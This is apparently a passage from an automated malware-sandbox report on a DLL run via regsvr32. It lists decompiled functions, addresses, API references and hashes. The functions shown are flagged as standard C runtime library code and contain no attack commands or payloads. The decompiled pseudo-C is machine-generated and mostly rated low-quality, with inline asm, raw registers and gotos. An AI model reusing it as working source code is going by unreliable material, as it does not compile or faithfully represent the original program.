				if (_t42 == 0) goto 0x2b0691ae;
				asm("movsd xmm0, [ebp+0x70]");
				asm("movsd xmm1, [esp+0x38]");
				 *((intOrPtr*)(_t72 + 0x48)) = _t42;
				 *((long long*)(_t72 + 0x50)) = __rcx;
				asm("movsd [esp+0x58], xmm0");
				asm("movsd [esp+0x68], xmm1");
				asm("movsd [esp+0x60], xmm6");
				E00007FFD7FFD2B074FBC(_t35, _t42, __r8,  *(_t72 + 0x30), _t76, _t69);
				if (E00007FFD7FFD2B074F84() != 0) goto 0x2b0691a6;
				E00007FFD7FFD2B074B40(_t42, _t14);
				asm("movsd xmm0, [esp+0x68]");
				goto 0x2b0691c8;
				E00007FFD7FFD2B074B40(_t42, _t14);
				E00007FFD7FFD2B074FBC(_t35, _t42, __r8,  *(_t72 + 0x30), _t76, _t69);
				asm("movsd xmm0, [esp+0x38]");
				_t34 = E00007FFD7FFD2B064980(_t42,  *(_t70 - 0x20) ^ _t72, _t76, __r8);
				asm("movaps xmm6, [esp+0xf0]");
				return _t34;
			}

0x7ffd2b0690a7
0x7ffd2b0690ab
0x7ffd2b0690b2
0x7ffd2b0690b6
0x7ffd2b0690bd
0x7ffd2b0690c0
0x7ffd2b0690c9
0x7ffd2b0690d7
0x7ffd2b0690dd
0x7ffd2b0690e5
0x7ffd2b0690ea
0x7ffd2b0690ef
0x7ffd2b0690fa
0x7ffd2b069100
0x7ffd2b069105
0x7ffd2b06910c
0x7ffd2b069115
0x7ffd2b06911a
0x7ffd2b069125
0x7ffd2b069128
0x7ffd2b069136
0x7ffd2b06913b
0x7ffd2b069144
0x7ffd2b069147
0x7ffd2b06914c
0x7ffd2b069158
0x7ffd2b06915c
0x7ffd2b06915e
0x7ffd2b069163
0x7ffd2b069171
0x7ffd2b069175
0x7ffd2b06917a
0x7ffd2b069180
0x7ffd2b069186
0x7ffd2b06918c
0x7ffd2b06919d
0x7ffd2b0691a1
0x7ffd2b0691a6
0x7ffd2b0691ac
0x7ffd2b0691b0
0x7ffd2b0691bd
0x7ffd2b0691c2
0x7ffd2b0691cf
0x7ffd2b0691d4
0x7ffd2b0691eb

APIs

_ctrlfp.LIBCMT ref: 00007FFD2B0690DD
_exception_enabled.LIBCMT ref: 00007FFD2B069100

Part of subcall function 00007FFD2B068E84: _set_statfp.LIBCMT ref: 00007FFD2B068EAB
Part of subcall function 00007FFD2B068E84: _set_statfp.LIBCMT ref: 00007FFD2B068F1E

_raise_exc.LIBCMT ref: 00007FFD2B06914C
_ctrlfp.LIBCMT ref: 00007FFD2B06918C
_ctrlfp.LIBCMT ref: 00007FFD2B0691BD

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _ctrlfp$_set_statfp$_exception_enabled_raise_exc
String ID:
API String ID: 3456427917-0
Opcode ID: bbdcec2d665f9670fe17ef3f8aa769760990ff81749426f459c7f0c17560835d
Instruction ID: 2e5cf04d48543ecff6c983786c94d03f1c0c45e06a896cb6f6e63c2e0e15e387
Opcode Fuzzy Hash: bbdcec2d665f9670fe17ef3f8aa769760990ff81749426f459c7f0c17560835d
Instruction Fuzzy Hash: F931A432B19A858AE751DF24E9112BFB364FB8A388F140235FA4D0AA68DF7CD441D780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B065590 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,00007FFD2B0656A5,?,?,?,?,00007FFD2B0670B6,?,?,?,00007FFD2B0659E5), ref: 00007FFD2B0655B9
DecodePointer.KERNEL32(?,?,?,00007FFD2B0656A5,?,?,?,?,00007FFD2B0670B6,?,?,?,00007FFD2B0659E5), ref: 00007FFD2B0655C9

Part of subcall function 00007FFD2B067B00: _errno.LIBCMT ref: 00007FFD2B067B09
Part of subcall function 00007FFD2B067B00: _invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B067B14

EncodePointer.KERNEL32(?,?,?,00007FFD2B0656A5,?,?,?,?,00007FFD2B0670B6,?,?,?,00007FFD2B0659E5), ref: 00007FFD2B065647

Part of subcall function 00007FFD2B0679F0: realloc.LIBCMT ref: 00007FFD2B067A1B
Part of subcall function 00007FFD2B0679F0: Sleep.KERNEL32(?,?,00000000,00007FFD2B065637,?,?,?,00007FFD2B0656A5,?,?,?,?,00007FFD2B0670B6), ref: 00007FFD2B067A37

EncodePointer.KERNEL32(?,?,?,00007FFD2B0656A5,?,?,?,?,00007FFD2B0670B6,?,?,?,00007FFD2B0659E5), ref: 00007FFD2B065657
EncodePointer.KERNEL32(?,?,?,00007FFD2B0656A5,?,?,?,?,00007FFD2B0670B6,?,?,?,00007FFD2B0659E5), ref: 00007FFD2B065664

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: c56fcdd11b20363de1917eb9bf5ea348424f4bb33bde1d58603edb43d8e9abfe
Instruction ID: 86ebf92b98f32cae67f7361d5fdf2b6075ea0dfbe0e6378acf8cd93a9638af92
Opcode Fuzzy Hash: c56fcdd11b20363de1917eb9bf5ea348424f4bb33bde1d58603edb43d8e9abfe
Instruction Fuzzy Hash: D421A021B1BA4689EE039B51EF651796390BB5ABC0F444435EB4D073B5DEFCE441E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B065458 Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00007FFD2B06547A
DecodePointer.KERNEL32 ref: 00007FFD2B06548A

Part of subcall function 00007FFD2B067B00: _errno.LIBCMT ref: 00007FFD2B067B09
Part of subcall function 00007FFD2B067B00: _invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B067B14

EncodePointer.KERNEL32 ref: 00007FFD2B065502

Part of subcall function 00007FFD2B0679F0: realloc.LIBCMT ref: 00007FFD2B067A1B
Part of subcall function 00007FFD2B0679F0: Sleep.KERNEL32(?,?,00000000,00007FFD2B065637,?,?,?,00007FFD2B0656A5,?,?,?,?,00007FFD2B0670B6), ref: 00007FFD2B067A37

EncodePointer.KERNEL32 ref: 00007FFD2B065512
EncodePointer.KERNEL32 ref: 00007FFD2B06551F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: bbf7ca0c674fe320cd355004688deff3e5009fa670da5bf74980f2a14ead86fd
Instruction ID: d50337320a470ba1e96ffd4d0270dea17fee65e34f5b74739474b1c3f1614173
Opcode Fuzzy Hash: bbf7ca0c674fe320cd355004688deff3e5009fa670da5bf74980f2a14ead86fd
Instruction Fuzzy Hash: BC213E21B0BA4A89EE039B11FE2917D63A1AB4ABC0B584434DF4E47375EFBCE4519380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06F6E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 31%

			E00007FFD7FFD2B06F6E4(void* __edx, void* __esi, long long __rbx, void* __rdx, void* __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, long long _a8) {
				char _v24;
				char _v40;
				char _v56;
				signed int _v64;
				signed int _v72;
				signed int _v80;
				signed long long _v88;
				char _t37;
				char _t39;
				signed int _t40;
				char* _t61;
				intOrPtr _t62;
				char* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t76;
				char* _t81;
				char* _t82;
				intOrPtr _t87;
				char* _t98;
				intOrPtr* _t100;
				intOrPtr* _t101;

				_t95 = __r8;
				_t90 = __rsi;
				_t89 = __rdi;
				_t44 = __esi;
				_a8 = __rbx;
				_v88 = _v88 & 0x00000000;
				_v72 = _v72 & 0x00000000;
				_v80 = _v80 & 0xffff0000;
				_v64 = _v64 & 0xffff0000;
				_t61 =  *0x2b0c9a78; // 0x0
				if (_t61 == 0) goto 0x2b06f79e;
				if ( *_t61 != 0x3f) goto 0x2b06f78c;
				_t40 =  *((intOrPtr*)(_t61 + 1));
				if (_t40 != 0x40) goto 0x2b06f761;
				 *0x2b0c9a70 =  *0x2b0c9a70 + 2;
				E00007FFD7FFD2B06E43C(__esi, _t40 - 0x40, __rbx,  &_v40, __rdx, __rdi, __rsi, __r8, __r10, __r11);
				E00007FFD7FFD2B06A9E0( &_v24, "CV: ");
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t61,  &_v56, _t61);
				asm("movaps xmm5, [ebp-0x30]");
				goto 0x2b06f798;
				if (_t40 != 0x24) goto 0x2b06f78c;
				E00007FFD7FFD2B06CF0C(_t40, 0, _t61,  &_v24, _t61, __rdi, _t90, __r10, __r11);
				asm("movups xmm5, [eax]");
				asm("movaps [ebp-0x50], xmm5");
				if (_v80 != 2) goto 0x2b06f7a2;
				_t62 =  *0x2b0c9a78; // 0x0
				 *0x2b0c9a70 = _t62;
				E00007FFD7FFD2B06E43C(_t44, _v80 - 2, _t61,  &_v24, _t61, _t89, _t90, _t95, __r10, __r11);
				asm("movups xmm5, [eax]");
				asm("movaps [ebp-0x50], xmm5");
				goto 0x2b06f7a2;
				asm("movaps xmm5, [ebp-0x50]");
				if (_v80 != 3) goto 0x2b06f7af;
				goto 0x2b06f87c;
				if (_v80 == 2) goto 0x2b06f7d4;
				if (( *0x2b0c9a8c & 0x00001000) != 0) goto 0x2b06f7cd;
				_t63 =  *0x2b0c9a70; // 0x0
				if ( *_t63 != 0) goto 0x2b06f7d4;
				asm("movdqa [ebp-0x40], xmm5");
				goto 0x2b06f7e4;
				_t87 =  *0x2b0c9a78; // 0x0
				E00007FFD7FFD2B06AD7C( &_v72, _t87);
				_t64 =  *0x2b0c9a80; // 0x0
				if (_t64 != 0) goto 0x2b06f823;
				_t76 = _v72;
				if (_t76 == 0) goto 0x2b06f7fe;
				_t65 =  *_t76;
				 *0x2b0c9a88 =  *_t65() + 1;
				 *0x2b0c9a38();
				 *0x2b0c9a80 = _t65;
				if (_t65 == 0) goto 0x2b06f87c;
				r8d =  *0x2b0c9a88; // 0x0
				E00007FFD7FFD2B06A4DC(_t61,  &_v72, _t65, _t90);
				_t98 =  *0x2b0c9a80; // 0x0
				_t37 =  *_t98;
				_t81 = _t98;
				if (_t37 == 0) goto 0x2b06f870;
				if (_t37 != 0x20) goto 0x2b06f861;
				 *_t81 = 0x20;
				_t82 = _t81 + 1;
				goto 0x2b06f85a;
				_t100 = _t98 + 2;
				if ( *_t100 == 0x20) goto 0x2b06f857;
				goto 0x2b06f869;
				 *_t82 = _t37;
				_t101 = _t100 + 1;
				if ( *_t101 != 0) goto 0x2b06f849;
				_t39 =  *_t101;
				 *((char*)(_t82 + 1)) = _t39;
				return _t39;
			}

0x7ffd2b06f6e4
0x7ffd2b06f6e4
0x7ffd2b06f6e4
0x7ffd2b06f6e4
0x7ffd2b06f6e4
0x7ffd2b06f6f1
0x7ffd2b06f6f6
0x7ffd2b06f700
0x7ffd2b06f703
0x7ffd2b06f706
0x7ffd2b06f710
0x7ffd2b06f719
0x7ffd2b06f71b
0x7ffd2b06f721
0x7ffd2b06f723
0x7ffd2b06f72f
0x7ffd2b06f742
0x7ffd2b06f74e
0x7ffd2b06f751
0x7ffd2b06f756
0x7ffd2b06f75b
0x7ffd2b06f75f
0x7ffd2b06f764
0x7ffd2b06f76c
0x7ffd2b06f771
0x7ffd2b06f774
0x7ffd2b06f77c
0x7ffd2b06f77e
0x7ffd2b06f785
0x7ffd2b06f790
0x7ffd2b06f795
0x7ffd2b06f798
0x7ffd2b06f79c
0x7ffd2b06f79e
0x7ffd2b06f7a6
0x7ffd2b06f7aa
0x7ffd2b06f7b3
0x7ffd2b06f7bf
0x7ffd2b06f7c1
0x7ffd2b06f7cb
0x7ffd2b06f7cd
0x7ffd2b06f7d2
0x7ffd2b06f7d4
0x7ffd2b06f7df
0x7ffd2b06f7e4
0x7ffd2b06f7ee
0x7ffd2b06f7f0
0x7ffd2b06f7f7
0x7ffd2b06f7f9
0x7ffd2b06f803
0x7ffd2b06f811
0x7ffd2b06f817
0x7ffd2b06f821
0x7ffd2b06f823
0x7ffd2b06f831
0x7ffd2b06f836
0x7ffd2b06f83d
0x7ffd2b06f840
0x7ffd2b06f845
0x7ffd2b06f84b
0x7ffd2b06f850
0x7ffd2b06f852
0x7ffd2b06f855
0x7ffd2b06f857
0x7ffd2b06f85d
0x7ffd2b06f85f
0x7ffd2b06f861
0x7ffd2b06f866
0x7ffd2b06f86e
0x7ffd2b06f870
0x7ffd2b06f873
0x7ffd2b06f889

APIs

DName::DName.LIBCMT ref: 00007FFD2B06F742

Part of subcall function 00007FFD2B06A9E0: DName::doPchar.LIBCMT ref: 00007FFD2B06AA19

DName::operator+=.LIBCMT ref: 00007FFD2B06F756
DName::operator=.LIBCMT ref: 00007FFD2B06F7DF

Strings

CV: , xrefs: 00007FFD2B06F734

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: NameName::Name::doName::operator+=Name::operator=Pchar
String ID: CV:
API String ID: 3883879377-3725821052
Opcode ID: a86a0f8eaa0663e3be6ccd0c22ac171db998113c97d966c170ef7d56a079b069
Instruction ID: 4959d473bfc5c00f44b38e4146660a830e39ca9311fb39a96d26797220242bd2
Opcode Fuzzy Hash: a86a0f8eaa0663e3be6ccd0c22ac171db998113c97d966c170ef7d56a079b069
Instruction Fuzzy Hash: 7B51F112F0A6868CFB138B658E623BC23A0BF56744F548174CA5E066F2DFACA445E390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B064AD4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FFD7FFD2B064AD4(void* __rcx, void* __rdx) {
				void* _t7;

				goto 0x2b0666c4;
				asm("int3");
				asm("int3");
				asm("int3");
				goto 0x2b066620;
				asm("int3");
				asm("int3");
				asm("int3");
				return E00007FFD7FFD2B0657E0(_t7, __rdx + 0x11, __rcx + 0x11) & 0xffffff00 | _t5 == 0x00000000;
			}

0x7ffd2b064ad4
0x7ffd2b064ad9
0x7ffd2b064ada
0x7ffd2b064adb
0x7ffd2b064adc
0x7ffd2b064ae1
0x7ffd2b064ae2
0x7ffd2b064ae3
0x7ffd2b064b01

APIs

_lock.LIBCMT ref: 00007FFD2B0666F8

Part of subcall function 00007FFD2B0696D8: _amsg_exit.LIBCMT ref: 00007FFD2B069702

free.LIBCMT ref: 00007FFD2B0667EF

Strings

, xrefs: 00007FFD2B066774

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _amsg_exit_lockfree
String ID:
API String ID: 1309213036-3916222277
Opcode ID: fc154583434b98a0a7a9d7f18726423fc2ba4813a2cb351f82a7e7d1208b6c57
Instruction ID: 57d1e2694437e742456ebb19a6719e42bc63deeea916d3a67ef5c3aff0e7a955
Opcode Fuzzy Hash: fc154583434b98a0a7a9d7f18726423fc2ba4813a2cb351f82a7e7d1208b6c57
Instruction Fuzzy Hash: 69319721B0B78649FB1ADB51EA627B97294FF46780F448035EB8D477A5DEBCE440E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B074368 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 54%

			E00007FFD7FFD2B074368(signed int __ecx, void* __edx, intOrPtr* __rcx, char* __rdx, void* __r8, intOrPtr _a40, long long _a48) {
				signed int _v56;
				char _v80;
				intOrPtr _v100;
				char _v104;
				long long _v120;
				void* _v128;
				long long _v136;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				char _t34;
				signed int _t38;
				intOrPtr _t41;
				void* _t42;
				signed long long _t54;
				signed long long _t55;
				intOrPtr* _t59;
				signed long long _t69;
				void* _t75;
				char* _t76;
				void* _t77;
				void* _t81;
				void* _t84;

				_t38 = __ecx;
				_t54 =  *0x2b0c70a0; // 0xf787487f4682
				_t55 = _t54 ^  &_v128;
				_v56 = _t55;
				_t75 = __r8;
				_t76 = __rdx;
				_t41 = r9d;
				_t69 =  &_v104;
				r9d = 0x16;
				E00007FFD7FFD2B07980C(_t42,  *__rcx, _t69,  &_v80, _t81, _t84);
				if (_t76 != 0) goto 0x2b0743c0;
				E00007FFD7FFD2B067698(_t55);
				 *_t55 = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b074481;
				if (_t75 == 0) goto 0x2b0743ad;
				r12d = _v100;
				r12d = r12d - 1;
				_t59 = _t55 + _t76;
				if (_t75 == (_t69 | 0xffffffff)) goto 0x2b0743ea;
				r8d = _t41;
				if (E00007FFD7FFD2B079678(_t55, _t59, _t59, _t75 - _t55,  &_v104) == 0) goto 0x2b074403;
				 *_t76 = 0;
				goto 0x2b074481;
				_t33 = _v100 - 1;
				if (_t33 - 0xfffffffc < 0) goto 0x2b07444f;
				if (_t33 - _t41 >= 0) goto 0x2b07444f;
				if ((_t38 & 0xffffff00 | r12d - _t33 < 0x00000000) == 0) goto 0x2b074428;
				_t34 =  *_t59;
				if (_t34 != 0) goto 0x2b07441c;
				 *((char*)(_t59 + 1 - 2)) = _t34;
				r8d = _t41;
				_v128 = _a48;
				_v136 = 1;
				E00007FFD7FFD2B0740E4(_t38 & 0xffffff00 | r12d - _t33 < 0x00000000, _t34, _t59 + 1, _t76, _t75, _t75, _t76, _t77,  &_v104);
				goto 0x2b074481;
				r9d = _a40;
				r8d = _t41;
				_v120 = _a48;
				_v128 = 1;
				_v136 =  &_v104;
				0x2b0739a0();
				return E00007FFD7FFD2B064980(_t38 & 0xffffff00 | r12d - _t33 < 0x00000000, _v56 ^  &_v128, _t75,  &_v80);
			}

0x7ffd2b074368
0x7ffd2b074376
0x7ffd2b07437d
0x7ffd2b074380
0x7ffd2b074388
0x7ffd2b07438b
0x7ffd2b07438e
0x7ffd2b07439b
0x7ffd2b0743a0
0x7ffd2b0743a3
0x7ffd2b0743ab
0x7ffd2b0743ad
0x7ffd2b0743b2
0x7ffd2b0743b4
0x7ffd2b0743bb
0x7ffd2b0743c3
0x7ffd2b0743c5
0x7ffd2b0743cc
0x7ffd2b0743db
0x7ffd2b0743e2
0x7ffd2b0743ef
0x7ffd2b0743fc
0x7ffd2b0743fe
0x7ffd2b074401
0x7ffd2b074407
0x7ffd2b074412
0x7ffd2b074416
0x7ffd2b07441a
0x7ffd2b07441c
0x7ffd2b074423
0x7ffd2b074425
0x7ffd2b074435
0x7ffd2b074438
0x7ffd2b074443
0x7ffd2b074448
0x7ffd2b07444d
0x7ffd2b074457
0x7ffd2b07445f
0x7ffd2b074462
0x7ffd2b074472
0x7ffd2b074477
0x7ffd2b07447c
0x7ffd2b07449b

APIs

_fltout2.LIBCMT ref: 00007FFD2B0743A3
_errno.LIBCMT ref: 00007FFD2B0743AD
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B0743B4

Strings

-, xrefs: 00007FFD2B0743CF

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno_fltout2_invalid_parameter_noinfo
String ID: -
API String ID: 485257318-2547889144
Opcode ID: 6de6eeb44deb5c97469eccab94f75fc10c1770063f15b04a8e2b9e09bce0002d
Instruction ID: 6f06367eb8cd463edc137896c2abc2b647ccbe9b53fd762ccd732327865dd05a
Opcode Fuzzy Hash: 6de6eeb44deb5c97469eccab94f75fc10c1770063f15b04a8e2b9e09bce0002d
Instruction Fuzzy Hash: 17312C21B0968145EA229B25AE603ADF760EB467D4F184231EF9C07BE5DF6CD405F740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B064A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FFD2B066578
free.LIBCMT ref: 00007FFD2B0665E9
free.LIBCMT ref: 00007FFD2B0665F1

Strings

, xrefs: 00007FFD2B06655F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$_lock
String ID:
API String ID: 538337703-3916222277
Opcode ID: f8cf7f7b5a1622d53e07f8d2eeeabf8aebdaf235d41beca78e05f628581b931b
Instruction ID: b1598d337a427ee7a05463a02a81c481ad02217f8cdfde54d0376640fa6d2248
Opcode Fuzzy Hash: f8cf7f7b5a1622d53e07f8d2eeeabf8aebdaf235d41beca78e05f628581b931b
Instruction Fuzzy Hash: A431DE22B0AB9649EB169B61DA233A97394FF06780F144036DB4C477A6EFBDE450D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B079678 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD2B079678(intOrPtr* __rax, long long __rbx, char* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t15;
				void* _t17;
				void* _t30;
				char* _t36;
				char* _t37;
				char* _t38;
				char* _t42;
				intOrPtr* _t52;

				_t42 = __rcx;
				_a8 = __rbx;
				_t52 =  *((intOrPtr*)(__r9 + 0x10));
				r11d = 0;
				_t40 = __rcx;
				if (__rcx != 0) goto 0x2b0796a9;
				E00007FFD7FFD2B067698(__rax);
				 *__rax = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b079739;
				if (__rdx == 0) goto 0x2b079691;
				 *((intOrPtr*)(__rcx)) = r11b;
				_t14 =  >  ? r8d : r11d;
				_t15 = ( >  ? r8d : r11d) + 1;
				if (__rdx - __rax > 0) goto 0x2b0796d0;
				_t17 = E00007FFD7FFD2B067698(__rax);
				goto 0x2b07969b;
				 *__rcx = 0x30;
				_t3 = _t42 + 1; // 0x1
				_t36 = _t3;
				goto 0x2b0796f4;
				if ( *_t52 == r11b) goto 0x2b0796e7;
				goto 0x2b0796ec;
				 *_t36 = 0x30;
				_t37 = _t36 + 1;
				r8d = r8d - 1;
				_t30 = r8d;
				if (_t30 > 0) goto 0x2b0796d9;
				 *_t37 = r11b;
				if (_t30 < 0) goto 0x2b079713;
				if ( *((char*)(_t52 + 1)) - 0x35 < 0) goto 0x2b079713;
				goto 0x2b079709;
				 *_t37 = 0x30;
				_t38 = _t37 - 1;
				if ( *_t38 == 0x39) goto 0x2b079706;
				 *_t38 =  *_t38 + 1;
				if ( *__rcx != 0x31) goto 0x2b07971e;
				 *((intOrPtr*)(__r9 + 4)) =  *((intOrPtr*)(__r9 + 4)) + 1;
				goto 0x2b079737;
				_t6 = _t40 + 1; // 0x1
				E00007FFD7FFD2B0653B0(_t17, _t6);
				_t7 = _t40 + 1; // 0x1
				_t8 = _t38 + 1; // 0x1
				E00007FFD7FFD2B064B80(0x30,  *__rcx - 0x31, __rcx, _t7, _t8);
				return 0;
			}

0x7ffd2b079678
0x7ffd2b079678
0x7ffd2b079682
0x7ffd2b079686
0x7ffd2b079689
0x7ffd2b07968f
0x7ffd2b079691
